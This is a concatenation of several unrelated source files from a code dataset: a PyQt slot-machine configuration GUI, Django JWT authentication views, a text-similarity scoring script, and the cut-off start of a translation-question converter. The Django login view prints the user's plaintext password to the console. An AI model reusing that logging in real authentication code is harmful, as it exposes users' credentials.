26)\n self.deleteLines.append(button_delete)\n self.deleteLines[-1].clicked.connect(self.click_delete_line)\n\n self.grid_lines.addWidget(self.lines[-1], self.count_lines, 0)\n\n self.grid_lines.addWidget(self.deleteLines[-1], self.count_lines, 1)\n\n self.count_lines += 1\n\n def click_delete_line(self):\n sender = self.sender()\n num = self.deleteLines.index(sender)\n\n self.grid_lines.removeWidget(self.lines[num])\n sip.delete(self.lines[num])\n del self.lines[num]\n\n self.grid_lines.removeWidget(self.deleteLines[num])\n sip.delete(self.deleteLines[num])\n del self.deleteLines[num]\n\n def switch_mode(self):\n if self.param_mode is False:\n width = self.box_frequency.width()\n self.freq_anim = QtCore.QPropertyAnimation(self.box_frequency, b'maximumWidth')\n self.param_anim = QtCore.QPropertyAnimation(self.box_param, b'maximumWidth')\n self.freq_anim.setEasingCurve(QtCore.QEasingCurve.InQuad)\n self.param_anim.setEasingCurve(QtCore.QEasingCurve.InQuad)\n self.freq_anim.setDuration(320)\n self.param_anim.setDuration(320)\n self.freq_anim.setStartValue(width)\n self.param_anim.setStartValue(0)\n self.freq_anim.setEndValue(0)\n self.param_anim.setEndValue(width)\n self.freq_anim.start()\n self.param_anim.start()\n self.param_mode = True\n\n else:\n self.fon.addWidget(self.box_frequency, 1, 1)\n width = self.box_param.width()\n self.freq_anim = QtCore.QPropertyAnimation(self.box_frequency, b'maximumWidth')\n self.param_anim = QtCore.QPropertyAnimation(self.box_param, b'maximumWidth')\n self.freq_anim.setEasingCurve(QtCore.QEasingCurve.InQuad)\n self.param_anim.setEasingCurve(QtCore.QEasingCurve.InQuad)\n self.freq_anim.setDuration(320)\n self.param_anim.setDuration(320)\n self.freq_anim.setStartValue(0)\n self.param_anim.setStartValue(width)\n self.freq_anim.setEndValue(width)\n self.param_anim.setEndValue(0)\n self.freq_anim.start()\n self.param_anim.start()\n self.param_mode = False\n\n def width_changed(self):\n if isint(str(self.line_width.text())) > 0:\n self.width = int(str(self.line_width.text()))\n for i in range(len(self.symbols)):\n self.symbols[i].width = self.width\n\n self.symbols[i].fon_payment.removeWidget(self.symbols[i].line_payment)\n sip.delete(self.symbols[i].line_payment)\n\n 
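# the old payment LineEdits row was deleted just above; rebuild it with the new window width\n            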
self.symbols[i].line_payment = LineEdits(self.width, 40, 0, sys.maxsize, None, None, True)\n self.symbols[i].fon_payment.addWidget(self.symbols[i].line_payment)\n\n self.symbols[i].base.width = self.width\n\n self.symbols[i].base.fon.removeWidget(self.symbols[i].base.buttons_position)\n sip.delete(self.symbols[i].base.buttons_position)\n self.symbols[i].base.buttons_position = SwitchButtons(self.width, 40)\n self.symbols[i].base.fon.addWidget(self.symbols[i].base.buttons_position, 2, 1)\n\n if self.symbols[i].base.checkbox_scatter.checkState() == QtCore.Qt.Checked:\n self.symbols[i].base.fon.removeWidget(self.symbols[i].base.line_freespins)\n sip.delete(self.symbols[i].base.line_freespins)\n self.symbols[i].base.line_freespins = LineEdits(self.width, 28, 0, sys.maxsize, None, None, True)\n self.symbols[i].base.fon.addWidget(self.symbols[i].base.line_freespins, 4, 1)\n\n if self.symbols[i].free is not None:\n self.symbols[i].free.width = self.width\n\n self.symbols[i].free.fon.removeWidget(self.symbols[i].free.buttons_position)\n sip.delete(self.symbols[i].free.buttons_position)\n self.symbols[i].free.buttons_position = SwitchButtons(self.width, 28)\n self.symbols[i].free.fon.addWidget(self.symbols[i].free.buttons_position, 2, 1)\n\n if self.symbols[i].free.checkbox_scatter.checkState() == QtCore.Qt.Checked:\n self.symbols[i].free.fon.removeWidget(self.symbols[i].free.line_freespins)\n sip.delete(self.symbols[i].free.line_freespins)\n self.symbols[i].free.line_freespins = LineEdits(self.width, 28, 0, sys.maxsize, None, None, True)\n self.symbols[i].free.fon.addWidget(self.symbols[i].free.line_freespins, 4, 1)\n\n for i in range(len(self.lines)):\n pos = self.grid_lines.getItemPosition(self.grid_lines.indexOf(self.lines[i]))\n self.grid_lines.removeWidget(self.lines[i])\n sip.delete(self.lines[i])\n\n self.lines[i] = LineEdits(self.width, 28, 1, self.height, 24, 0)\n self.grid_lines.addWidget(self.lines[i], pos[0], pos[1])\n\n def height_changed(self):\n if isint(str(self.line_height.text())) > 0:\n self.height = int(str(self.line_height.text()))\n for line in self.lines:\n for atom in line.lines:\n try:\n atom.disconnect()\n except:\n pass\n\n atom.textChanged.connect(lambda: self.int_validate(1, self.height))\n atom.textChanged.emit(atom.text())\n\n int_validate = int_validate\n float_validate = float_validate\n\n def collect_info(self):\n d = {}\n d.update({'window': [self.width, self.height]})\n symbols = []\n for i in range(len(self.symbols)):\n symbols.append(self.symbols[i].collect_info())\n d.update({'symbols': symbols})\n\n lines = []\n for i in range(len(self.lines)):\n if self.lines[i].arrange_info() is not None:\n lines.append(self.lines[i].arrange_info())\n d.update({'lines': lines})\n\n if isint(str(self.line_freemultiplier.text())) >= 0:\n d.update({'free_multiplier': int(str(self.line_freemultiplier.text()))})\n\n if isint(str(self.line_distance.text())) >= 0:\n d.update({'distance': int(str(self.line_distance.text()))})\n\n if isfloat(str(self.line_rtp.text())) and isfloat(str(self.line_rtp_error.text())):\n d.update({'RTP': [float(str(self.line_rtp.text())), float(str(self.line_rtp_error.text()))]})\n\n if isfloat(str(self.line_volatility.text())) and isfloat(str(self.line_volatility_error.text())):\n d.update({'volatility': [float(str(self.line_volatility.text())), float(str(self.line_volatility_error.text()))]})\n\n if isfloat(str(self.line_hitrate.text())) and isfloat(str(self.line_hitrate_error.text())):\n d.update({'hitrate': [float(str(self.line_hitrate.text())), 
float(str(self.line_hitrate_error.text()))]})\n\n if isfloat(str(self.line_baseRTP.text())) and isfloat(str(self.line_baseRTP_error.text())):\n d.update({'baseRTP': [float(str(self.line_baseRTP.text())), float(str(self.line_baseRTP_error.text()))]})\n return d\n\n def set_info(self, interim):\n if 'window' in interim:\n self.line_width.setText(str(interim['window'][0]))\n self.width = interim['window'][0]\n self.line_height.setText(str(interim['window'][1]))\n self.height = interim['window'][1]\n\n for i in range(len(interim['symbols'])):\n self.click_add_symbol(True)\n self.symbols[i].set_info(interim['symbols'][i])\n\n for i in range(len(interim['lines'])):\n self.click_add_line()\n self.lines[i].fill_info(interim['lines'][i])\n\n if 'free_multiplier' in interim:\n self.line_freemultiplier.setText(str(interim['free_multiplier']))\n\n if 'distance' in interim:\n self.line_distance.setText(str(interim['distance']))\n\n if 'RTP' in interim:\n self.line_rtp.setText(str(interim['RTP'][0]))\n self.line_rtp_error.setText(str(interim['RTP'][1]))\n\n if 'volatility' in interim:\n self.line_volatility.setText(str(interim['volatility'][0]))\n self.line_volatility_error.setText(str(interim['volatility'][1]))\n\n if 'hitrate' in interim:\n self.line_hitrate.setText(str(interim['hitrate'][0]))\n self.line_hitrate_error.setText(str(interim['hitrate'][1]))\n\n if 'baseRTP' in interim:\n self.line_baseRTP.setText(str(interim['baseRTP'][0]))\n self.line_baseRTP_error.setText(str(interim['baseRTP'][1]))\n\n\nclass Main(QtWidgets.QMainWindow):\n def __init__(self):\n super(Main, self).__init__()\n\n self.setWindowTitle('Azino 777')\n self.setWindowIcon(QtGui.QIcon('icons/yarlyk.png'))\n self.setGeometry(200, 200, 1000, 600)\n\n self.tab = QtWidgets.QTabWidget()\n\n self.tool_file = self.addToolBar('file')\n self.tool_run = self.addToolBar('run')\n self.bar = self.menuBar()\n\n self.action_new = QtWidgets.QAction(QtGui.QIcon('icons/new.png'), 'New', self)\n self.action_new.setShortcut('Ctrl+N')\n self.action_new.triggered.connect(self.trigger_new)\n\n self.action_open = QtWidgets.QAction(QtGui.QIcon('icons/open.png'), 'Open', self)\n self.action_open.setShortcut('Ctrl+O')\n self.action_open.triggered.connect(self.trigger_open)\n\n self.action_save = QtWidgets.QAction(QtGui.QIcon('icons/save.png'), 'Save', self)\n self.action_save.setShortcut('Ctrl+S')\n self.action_save.triggered.connect(self.trigger_save)\n self.action_save.setEnabled(False)\n\n self.action_saveas = QtWidgets.QAction(QtGui.QIcon('icons/saveas.png'), 'Save as', self)\n self.action_saveas.setShortcut('Ctrl+Alt+S')\n self.action_saveas.triggered.connect(self.trigger_saveas)\n self.action_saveas.setEnabled(False)\n\n self.action_settings = QtWidgets.QAction(QtGui.QIcon('icons/settings.png'), 'Settings', self)\n\n self.action_quit = QtWidgets.QAction(QtGui.QIcon('icons/quit.png'), 'Quit', self)\n self.action_quit.setShortcut('Ctrl+Q')\n self.action_quit.triggered.connect(self.trigger_quit)\n\n self.action_submit = QtWidgets.QAction(QtGui.QIcon('icons/submit.png'), 'Submit', self)\n self.action_submit.triggered.connect(self.trigger_submit)\n\n self.action_run = QtWidgets.QAction(QtGui.QIcon('icons/run1.png'), 'Run', self)\n self.action_run.setEnabled(False)\n\n self.action_submitnrun = QtWidgets.QAction(QtGui.QIcon('icons/submitnrun1.png'), 'Submit and run', self)\n self.action_submitnrun.triggered.connect(self.trigger_submit)\n\n self.info = None\n\n self.json_path = None\n\n self.init_ui()\n\n def init_ui(self):\n 
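# assemble the main window: central tab widget, File/Run menus and the matching toolbars\n        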
self.setCentralWidget(self.tab)\n\n self.tab.setTabsClosable(True)\n self.tab.tabCloseRequested.connect(self.close_tab)\n self.tab.setMovable(True)\n\n file = self.bar.addMenu('File')\n run = self.bar.addMenu('Run')\n\n file.addAction(self.action_new)\n file.addAction(self.action_open)\n file.addAction(self.action_save)\n file.addAction(self.action_saveas)\n file.addAction(self.action_settings)\n file.addAction(self.action_quit)\n\n run.addAction(self.action_submit)\n run.addAction(self.action_run)\n run.addAction(self.action_submitnrun)\n\n self.tool_file.addAction(self.action_new)\n self.tool_file.addAction(self.action_open)\n self.tool_file.addAction(self.action_save)\n self.tool_file.addAction(self.action_saveas)\n\n self.tool_run.addAction(self.action_submit)\n self.tool_run.addAction(self.action_run)\n self.tool_run.addAction(self.action_submitnrun)\n\n def close_tab(self, current_index):\n current_widget = self.tab.widget(current_index)\n current_widget.deleteLater()\n self.tab.removeTab(current_index)\n if self.tab.__len__() == 0:\n self.action_submit.setEnabled(False)\n\n def trigger_submit(self):\n current = self.tab.currentWidget()\n self.info = current.collect_info()\n print(self.info)\n self.action_saveas.setEnabled(True)\n self.action_run.setEnabled(True)\n\n print(current.geometry())\n print(current.frame_symbols.geometry())\n for symbol in current.symbols:\n print(symbol.geometry())\n\n\n def trigger_new(self):\n global count_tabs\n new_tab = Window()\n self.tab.addTab(new_tab, 'untitled' + str(count_tabs))\n self.tab.setCurrentWidget(new_tab)\n count_tabs += 1\n self.action_submit.setEnabled(True)\n\n #button = QtWidgets.QPushButton('x')\n\n #tab_bar = self.tab.tabBar()\n #tab_bar.setTabButton(self.tab.currentIndex(), QtWidgets.QTabBar.RightSide, button)\n\n def trigger_save(self):\n file = open(self.json_path, 'w')\n json.dump(self.info, file)\n file.close()\n\n def trigger_saveas(self):\n self.json_path, _ = QtWidgets.QFileDialog.getSaveFileName(self, 'Save File', '', 'All Files (*);;Json Files (*.json)')\n if self.json_path:\n file = open(self.json_path, 'w')\n json.dump(self.info, file)\n file.close()\n self.action_save.setEnabled(True)\n i = self.tab.currentIndex()\n self.tab.setTabText(i, str(path_leaf(self.json_path)))\n\n def trigger_open(self):\n self.json_path, _ = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', 'All Files (*);;Json Files (*.json)')\n if self.json_path:\n file = open(self.json_path, 'r')\n j = file.read()\n self.info = json.loads(j)\n file.close()\n\n new_tab = Window()\n new_tab.set_info(self.info)\n\n self.tab.addTab(new_tab, str(path_leaf(self.json_path)))\n self.tab.setCurrentWidget(new_tab)\n\n self.action_save.setEnabled(True)\n self.action_saveas.setEnabled(True)\n self.action_run.setEnabled(True)\n\n def trigger_quit(self):\n QtWidgets.qApp.quit()\n\n\napp = QtWidgets.QApplication(sys.argv)\na_window = Main()\na_window.show()\nsys.exit(app.exec_())\n","repo_name":"DmitryBol/reel","sub_path":"FrontEnd/anime.py","file_name":"anime.py","file_ext":"py","file_size_in_byte":46088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15242874976","text":"import jwt\n\nimport remote_library.models\nfrom ..models import Jwt, Book, Video\nfrom ..models import CustomUser\nfrom datetime import datetime, timedelta\nfrom django.conf import settings\nimport random\nimport string\nfrom rest_framework.views import APIView\nfrom ..serializer import LoginSerializer, RegisterSerializer, 
RefreshSerializer, \\\n    SaveBookSerializer, SaveVideoSerializer, VideoSerializer, BookSerializer\nfrom django.contrib.auth import authenticate\nfrom rest_framework.response import Response\n\n\ndef get_random(length):\n    return ''.join(random.choices(string.ascii_uppercase + string.digits, k=length))\n\n\ndef get_access_token(payload):\n    return jwt.encode(\n        {\"exp\": datetime.now() + timedelta(minutes=5), **payload},\n        settings.SECRET_KEY,\n        algorithm=\"HS256\"\n    )\n\n\ndef get_refresh_token():\n    return jwt.encode(\n        {\"exp\": datetime.now() + timedelta(days=365), \"data\": get_random(10)},\n        settings.SECRET_KEY,\n        algorithm=\"HS256\"\n    )\n\n\nclass LoginView(APIView):\n    serializer_class = LoginSerializer\n    def post(self, requests):\n        serializer = self.serializer_class(data=requests.data)\n        serializer.is_valid(raise_exception=True)\n        print(serializer.validated_data['password'])\n\n        user = authenticate(username=serializer.validated_data['email'],\n                            password=serializer.validated_data['password'])\n        print(\"user\", user)\n        if not user:\n            return Response({\"error\": \"Invalid email or password\"}, status=\"400\")\n        # Jwt.objects.filter(user_id=user.id).delete()\n\n        access = get_access_token({\"some\": user.id})\n        refresh = get_refresh_token()\n        Jwt.objects.create(\n            user_id=user.id,\n            access=access,\n            refresh=refresh\n        )\n        return Response({\"access\": access, \"refresh\": refresh})\n\n\nclass RegisterView(APIView):\n    serializer_class = RegisterSerializer\n    def post(self, request):\n        serializer = self.serializer_class(data=request.data)\n        serializer.is_valid(raise_exception=True)\n\n        CustomUser.objects._create_user(**serializer.validated_data)\n\n        return Response({\"success\": \"User created.\"})\n\n\ndef verify_token(token):\n    #decode the token\n    try:\n        decoded_data = jwt.decode(token, settings.SECRET_KEY, algorithms=\"HS256\")\n    except Exception:\n        return None\n    exp=decoded_data[\"exp\"]\n    if datetime.now().timestamp() > exp:\n        return None\n    return decoded_data\n\n\nclass RefreshView(APIView):\n    serializer_class = RefreshSerializer\n    def post(self, request):\n        serializer = self.serializer_class(data=request.data)\n        serializer.is_valid(raise_exception=True)\n        try:\n            active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n        except Jwt.DoesNotExist:\n            return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n        if not verify_token(serializer.validated_data[\"refresh\"]):\n            return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n        access = get_access_token({\"some\": active_jwt.user.id})\n        refresh = get_refresh_token()\n\n        active_jwt.access = access\n        active_jwt.refresh = refresh\n        active_jwt.save()\n        return Response({\"access\": access, \"refresh\": refresh})\n\n\nclass LogOut(APIView):\n    serializer_class = RefreshSerializer\n    def post(self, request):\n        serializer = self.serializer_class(data=request.data)\n        serializer.is_valid(raise_exception=True)\n        try:\n            active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n        except Jwt.DoesNotExist:\n            return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n        if not verify_token(serializer.validated_data[\"refresh\"]):\n            return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n        Jwt.objects.filter(refresh=active_jwt.refresh).delete()\n        return Response({\"status\": \"Successfully logged out\"})\n\n\nclass SaveBook(APIView):\n    serializer_class = SaveBookSerializer\n    def post(self, request):\n        serializer = 
self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id=active_jwt.user.id\n book_id = serializer.validated_data[\"book_id\"]\n book_custom_user = Book.saved_by.through\n new_book_user = book_custom_user(book_id=book_id, customuser_id=id)\n new_book_user.save()\n return Response({\"status\": \"Success\"})\n\n\nclass SaveVideo(APIView):\n serializer_class = SaveVideoSerializer\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id=active_jwt.user.id\n video_id = serializer.validated_data[\"video_id\"]\n video_custom_user = Video.saved_by.through\n new_video_user = video_custom_user(video_id=video_id, customuser_id=id)\n new_video_user.save()\n return Response({\"status\": \"Success\"})\n\n\nclass SavedVideosView(APIView):\n serializer_class = RefreshSerializer\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id=active_jwt.user.id\n video_custom_user = Video.saved_by.through\n videos = video_custom_user.objects.filter(customuser_id=id)\n data = []\n for video in videos:\n print(video.video_id)\n video_object = Video.objects.get(pk=video.video_id)\n video_serializer = VideoSerializer(video_object)\n data.append(video_serializer.data)\n return Response(data)\n\n\nclass SavedBooksView(APIView):\n serializer_class = RefreshSerializer\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id=active_jwt.user.id\n book_custom_user = Book.saved_by.through\n books = book_custom_user.objects.filter(customuser_id=id)\n data = []\n for book in books:\n print(book.book_id)\n book_object = Book.objects.get(pk=book.book_id)\n book_serializer = BookSerializer(book_object)\n data.append(book_serializer.data)\n return Response(data)\n\n\nclass VerifySavedBook(APIView):\n serializer_class = SaveBookSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n 
except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id = active_jwt.user.id\n book_id = serializer.validated_data[\"book_id\"]\n book_custom_user = Book.saved_by.through\n book = book_custom_user.objects.filter(book_id=book_id, customuser_id=id)\n print(len(book))\n if (len(book)>=1):\n return Response({\"saved\": 1})\n else:\n return Response({\"saved\": 0})\n\n\nclass VerifySavedVideo(APIView):\n serializer_class = SaveVideoSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id = active_jwt.user.id\n video_id = serializer.validated_data[\"video_id\"]\n video_custom_user = Video.saved_by.through\n video = video_custom_user.objects.filter(video_id=video_id, customuser_id=id)\n print(len(video))\n if (len(video)>=1):\n return Response({\"saved\": 1})\n else:\n return Response({\"saved\": 0})\n\n\n\n\n","repo_name":"Valeriya2022/remote_library_api","sub_path":"remote_library_api/remote_library/views/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":9726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15735763672","text":"# https://stackoverflow.com/questions/65199011/is-there-a-way-to-check-similarity-between-two-full-sentences-in-python\n\nimport datetime\nimport os\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Dict\nfrom typing import List\n\nimport nltk\nimport spacy\nimport torch\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom rouge import Rouge\nfrom sacrebleu.metrics import BLEU\nfrom sentence_transformers import SentenceTransformer\nfrom sentence_transformers import util as sentence_transformer_util\nfrom utils import assert_path\nfrom utils import load_json\nfrom utils import save_json\nfrom worker_vs_gpt.config import DATA_DIR\n\n\n# nltk.download(\"punkt\")\n# nltk.download(\"stopwords\")\n\n\n# \"intfloat_e5-base\"\nclass TransformerSimilarity:\n def __init__(\n self, sentence_transformer_model_name: str = \"intfloat/e5-base\"\n ) -> None:\n self.device = torch.device(\"mps\" if torch.backends.mps.is_built() else \"cpu\")\n self.sentence_transformer_model = self.model = SentenceTransformer(\n sentence_transformer_model_name\n ).to(self.device)\n\n def embedding_similarity(self, text1: str, text2: str) -> float:\n text1_embedding: torch.tensor = self.model.encode(\n self._text_to_sentences(text1), convert_to_tensor=True\n )\n text2_embedding: torch.tensor = self.model.encode(\n self._text_to_sentences(text2), convert_to_tensor=True\n )\n\n cosine_scores = sentence_transformer_util.pytorch_cos_sim(\n text1_embedding, text2_embedding\n )\n return cosine_scores.mean().item()\n\n def _text_to_sentences(self, text: str) -> List[str]:\n return nltk.sent_tokenize(text)\n\n\nclass SimilarityScorer:\n def __init__(\n self,\n # spacy_model_name: str = \"en_core_web_lg\",\n ):\n # self.spacy_model = 
spacy.load(spacy_model_name)\n self.stop_words = set(stopwords.words(\"danish\"))\n self.rouge_scorer = Rouge()\n self.bleu_scorer = BLEU(effective_order=True)\n\n def spacy_cosine_similarity(self, text1: str, text2: str) -> float:\n \"\"\"\n Calculates the similarity between two texts using spacy's word embeddings.\n Similarity is the same whether text1 or text2 is the original text.\n \"\"\"\n # doc_text1 = self.spacy_model(text1)\n # doc_text2 = self.spacy_model(text2)\n # return doc_text1.similarity(doc_text2)\n pass\n\n def vocab_overlap(self, original: str, augmented: str) -> Dict:\n # Tokenize the input strings\n tokens1 = set(word_tokenize(original))\n tokens2 = set(word_tokenize(augmented))\n\n # Remove common English stopwords\n tokens1 = tokens1 - self.stop_words\n tokens2 = tokens2 - self.stop_words\n\n # Calculate the token overlap\n overlap = len(tokens1.intersection(tokens2))\n\n # Identify new words\n new_words1 = tokens1 - tokens2\n new_words2 = tokens2 - tokens1\n\n # Percentage overlap\n percentage_overlap = overlap / (len(tokens1) + len(tokens2))\n\n return {\n \"token_overlap\": overlap,\n \"percentage_token_overlap\": percentage_overlap,\n \"new_words_in_original\": list(new_words1),\n \"new_words_in_augmented\": list(new_words2),\n }\n\n def bleu_score(self, hypothesis: str, reference: str) -> float:\n \"\"\"\n Calculates the BLEU score between two strings.\n \"\"\"\n score = self.bleu_scorer.sentence_score(\n hypothesis=hypothesis,\n references=[reference],\n )\n\n return score.score / 100 # sacreBLEU gives the score in percent\n\n def rouge_score(self, hypothesis: str, reference: str) -> float:\n \"\"\"\n Calculates the ROUGE score between two strings.\n \"\"\"\n score = self.rouge_scorer.get_scores(\n hyps=hypothesis,\n refs=reference,\n )\n return score[0][\"rouge-l\"][\"f\"]\n\n\n@dataclass\nclass TextPair:\n original: str\n augmented: str\n target: str\n scorer: SimilarityScorer\n transformer_scorer: TransformerSimilarity\n\n # @property\n # def spacy_cosine_similarity(self) -> float:\n # \"\"\"\n # Calculates the similarity between two texts using spacy's word embeddings.\n # Similarity is the same whether text1 or text2 is the original text.\n # \"\"\"\n # return self.scorer.spacy_cosine_similarity(self.original, self.augmented)\n\n @property\n def vocab_overlap(self) -> Dict:\n return self.scorer.vocab_overlap(self.original, self.augmented)\n\n @property\n def bleu_score(self) -> float:\n return self.scorer.bleu_score(self.original, self.augmented)\n\n @property\n def rouge_score(self) -> float:\n return self.scorer.rouge_score(self.original, self.augmented)\n\n @property\n def transformer_similarity(self) -> float:\n return self.transformer_scorer.embedding_similarity(\n self.original, self.augmented\n )\n\n\ndef calculate_metrics(dataset_name: str = \"crowdflower\", model: str = \"gpt-4\") -> None:\n print(f\"Started process for dataset: {dataset_name}\")\n\n SS = SimilarityScorer()\n TS = TransformerSimilarity()\n\n assert_path(f\"results/{dataset_name}/\")\n\n # Results dictionary\n results: List[Dict] = []\n\n # open the data\n filename: Path = DATA_DIR / f\"{dataset_name}/balanced_{model}_augmented.json\"\n\n # skip if the file already exists\n if os.path.exists(f\"results/{dataset_name}/{model}_similarity.json\"):\n print(f\"!!! 
Skipping {dataset_name} as the file already exists.\")\n return\n\n text: str = \"h_text\" if dataset_name == \"ten-dim\" else \"text\"\n text: str = \"tweet\" if dataset_name == \"hate-speech\" else \"text\"\n augmented_text: str = (\n \"augmented_tweet\" if dataset_name == \"hate-speech\" else \"augmented_text\"\n )\n\n data: Dict = load_json(filename, verbose=False)\n\n print(f\"# Calculating metrics for {dataset_name}\")\n for i, text_entry in enumerate(data):\n if i % 100 == 0:\n print(\n f\"## {dataset_name} - {i} / {len(data)} @ {datetime.datetime.now().strftime('%H:%M:%S')}\"\n )\n\n tp: TextPair = TextPair(\n original=text_entry[text],\n augmented=text_entry[augmented_text],\n target=text_entry[\"target\"],\n scorer=SS,\n transformer_scorer=TS,\n )\n\n metrics = {\n # \"spacy_cosine_similarity\": tp.spacy_cosine_similarity,\n \"bleu_score\": tp.bleu_score,\n \"rouge_score\": tp.rouge_score,\n \"transformer_similarity\": tp.transformer_similarity,\n \"vocab_overlap\": tp.vocab_overlap,\n }\n\n text_entry[\"metrics\"] = metrics\n results.append(text_entry)\n\n save_json(results, f\"results/{dataset_name}/{model}_similarity.json\")\n return\n\n\nif __name__ == \"__main__\":\n import multiprocessing\n import os\n\n datasets: List[str] = [\n dataset\n for dataset in os.listdir(DATA_DIR)\n # if dataset not in [\".DS_Store\", \"similarity_results\", \"hate-speech\"]\n if dataset in [\"hate-speech\"]\n ]\n\n pool = multiprocessing.Pool(processes=1)\n # Use the pool to run the function in parallel with different parameters\n pool.map(calculate_metrics, datasets)\n\n # Close the pool to release resources\n pool.close()\n pool.join()\n","repo_name":"AGMoller/worker_vs_gpt","sub_path":"src/worker_vs_gpt/augmented_evaluation/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":7414,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"5396684024","text":"from __future__ import print_function, unicode_literals\n\nimport codecs\nimport inspect\nimport json\nimport os\nimport re\nfrom general_tools.file_utils import write_file\nfrom general_tools.url_utils import get_languages, join_url_parts, get_url\nfrom converters.common import quiet_print, dokuwiki_to_markdown, ResourceManifest, ResourceManifestEncoder\n\n\nclass TQConverter(object):\n\n tag_re = re.compile(r'\\{\\{tag>.*?\\}\\}', re.UNICODE)\n squiggly_re = re.compile(r'~~(?:DISCUSSION|NOCACHE)~~', re.UNICODE)\n extra_blanks_re = re.compile(r'\\n{3,}', re.UNICODE)\n chapter_link_re = re.compile(r'\\[\\[:en:bible:questions:comprehension:(.*?):home\\|(.*?)\\]\\]', re.UNICODE)\n missing_blank_line_re = re.compile(r'(\\n \\*.*\\n)(__)', re.UNICODE)\n story_num_re = re.compile(r'(Story )#', re.UNICODE)\n navigate_re = re.compile(r'\\[\\[:en:obs:notes:questions:(.*?)\\|\\s*(.*?)\\s*\\]\\]', re.UNICODE)\n navigate2_re = re.compile(r'\\[\\[en/obs/notes/questions/(.*?)\\|\\s*(.*?)\\s*\\]\\]', re.UNICODE)\n\n def __init__(self, lang_code, git_repo, bible_out_dir, obs_out_dir, quiet):\n \"\"\"\n\n :param str|unicode lang_code:\n :param str|unicode git_repo:\n :param str|unicode bible_out_dir:\n :param str|unicode obs_out_dir:\n :param bool quiet:\n \"\"\"\n self.git_repo = git_repo\n self.bible_out_dir = bible_out_dir\n self.obs_out_dir = obs_out_dir\n self.quiet = quiet\n # self.temp_dir = tempfile.mkdtemp()\n\n if 'github' not in git_repo:\n raise Exception('Currently only github repositories are supported.')\n\n # get the language data\n quiet_print(self.quiet, 
'Downloading language data...', end=' ')\n langs = get_languages()\n quiet_print(self.quiet, 'finished.')\n\n self.lang_data = next((l for l in langs if l['lc'] == lang_code), '')\n\n if not self.lang_data:\n raise Exception('Information for language \"{0}\" was not found.'.format(lang_code))\n\n # read the github access token\n root_dir = os.path.dirname(os.path.dirname(inspect.stack()[0][1]))\n with codecs.open(os.path.join(root_dir, 'github_api_token'), 'r', 'utf-8-sig') as in_file:\n # read the text from the file\n self.access_token = in_file.read()\n\n def __enter__(self):\n return self\n\n # noinspection PyUnusedLocal\n def __exit__(self, exc_type, exc_val, exc_tb):\n # delete temp files\n # if os.path.isdir(self.temp_dir):\n # shutil.rmtree(self.temp_dir, ignore_errors=True)\n pass\n\n def run(self):\n\n # https:// github.com/Door43/d43-en\n # https://api.github.com/repos/door43/d43-en/contents/obe/kt\n # https://api.github.com/repos/door43/d43-en/contents/obe/other\n lang_code = self.lang_data['lc']\n\n # clean up the git repo url\n if self.git_repo[-4:] == '.git':\n self.git_repo = self.git_repo[:-4]\n\n if self.git_repo[-1:] == '/':\n self.git_repo = self.git_repo[:-1]\n\n # get the source files from the git repository\n base_url = self.git_repo.replace('github.com', 'api.github.com/repos')\n bible_api_url = join_url_parts(base_url, 'contents/bible/questions/comprehension')\n obs_api_url = join_url_parts(base_url, 'contents/obs/notes/questions')\n\n quiet_print(self.quiet, 'Downloading Bible 